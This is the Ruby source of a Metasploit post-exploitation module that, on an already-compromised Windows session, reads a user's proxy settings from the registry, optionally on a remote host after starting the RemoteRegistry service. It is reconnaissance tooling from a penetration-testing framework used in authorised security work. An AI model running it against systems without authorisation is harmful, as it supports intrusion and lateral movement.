metasploit-gs/modules/post/windows/gather/enum_proxy.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::Services

  def initialize
    super(
      'Name' => 'Windows Gather Proxy Setting',
      'Description' => %q{
        This module pulls a user's proxy settings. If neither RHOST or SID
        are set it pulls the current user, else it will pull the user's settings
        for the specified SID and target host.
      },
      'Author' => [ 'mubix' ],
      'License' => MSF_LICENSE,
      'Platform' => [ 'win' ],
      'SessionTypes' => %w[meterpreter powershell shell],
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [],
        'SideEffects' => []
      },
      'Compat' => {
        'Meterpreter' => {
          'Commands' => %w[
            stdapi_registry_open_key
            stdapi_registry_open_remote_key
          ]
        }
      }
    )

    register_options([
      OptAddress.new('RHOST', [ false, 'Remote host to clone settings to, defaults to local' ]),
      OptString.new('SID', [ false, 'SID of user to clone settings to (SYSTEM is S-1-5-18)' ])
    ])
  end

  def run
    if datastore['SID']
      root_key, base_key = split_key("HKU\\#{datastore['SID']}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections")
    else
      root_key, base_key = split_key('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections')
    end

    if datastore['RHOST']
      if session.type != 'meterpreter'
        fail_with(Failure::BadConfig, "Cannot query remote registry on #{datastore['RHOST']}. Unsupported sesssion type #{session.type}")
      end

      begin
        key = session.sys.registry.open_remote_key(datastore['RHOST'], root_key)
      rescue ::Rex::Post::Meterpreter::RequestError
        print_error("Unable to contact remote registry service on #{datastore['RHOST']}")
        print_status('Attempting to start RemoteRegistry service remotely...')
        begin
          service_start('RemoteRegistry', datastore['RHOST'])
        rescue StandardError
          fail_with(Failure::Unknown, 'Unable to start RemoteRegistry service, exiting...')
        end
        startedreg = true
        key = session.sys.registry.open_remote_key(datastore['RHOST'], root_key)
      end

      open_key = key.open_key(base_key)
      values = open_key.query_value('DefaultConnectionSettings')
      data = values.data

      # If we started the service we need to stop it.
      service_stop('RemoteRegistry', datastore['RHOST']) if startedreg
    else
      data = registry_getvaldata("#{root_key}\\#{base_key}", 'DefaultConnectionSettings')
    end

    fail_with(Failure::Unknown, "Could not retrieve 'DefaultConnectionSettings' data") if data.blank?
    fail_with(Failure::Unknown, "Retrieved malformed proxy settings (too small: #{data.length} bytes <= 24 bytes)") if data.length <= 24

    print_status("Proxy Counter = #{data[4, 1].unpack('C*')[0]}")

    case data[8, 1].unpack('C*')[0]
    when 1
      print_status('Setting: No proxy settings')
    when 3
      print_status('Setting: Proxy server')
    when 5
      print_status('Setting: Set proxy via AutoConfigure script')
    when 7
      print_status('Setting: Proxy server and AutoConfigure script')
    when 9
      print_status('Setting: WPAD')
    when 11
      print_status('Setting: WPAD and Proxy server')
    when 13
      print_status('Setting: WPAD and AutoConfigure script')
    when 15
      print_status('Setting: WPAD, Proxy server and AutoConfigure script')
    else
      print_status('Setting: Unknown proxy setting found')
    end

    cursor = 12
    proxyserver = data[cursor + 4, data[cursor, 1].unpack('C*')[0]]
    print_status("Proxy Server: #{proxyserver}") unless proxyserver.blank?

    cursor = cursor + 4 + data[cursor].unpack('C*')[0]
    additionalinfo = data[cursor + 4, data[cursor, 1].unpack('C*')[0]]
    print_status("Additional Info: #{additionalinfo}") unless additionalinfo.blank?

    cursor = cursor + 4 + data[cursor].unpack('C*')[0]
    autoconfigurl = data[cursor + 4, data[cursor, 1].unpack('C*')[0]]
    print_status("AutoConfigURL: #{autoconfigurl}") unless autoconfigurl.blank?
  end
end